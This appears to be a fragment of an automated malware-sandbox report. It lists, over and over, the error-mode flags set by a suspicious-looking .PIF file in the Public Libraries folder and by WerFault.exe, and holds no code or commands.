Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
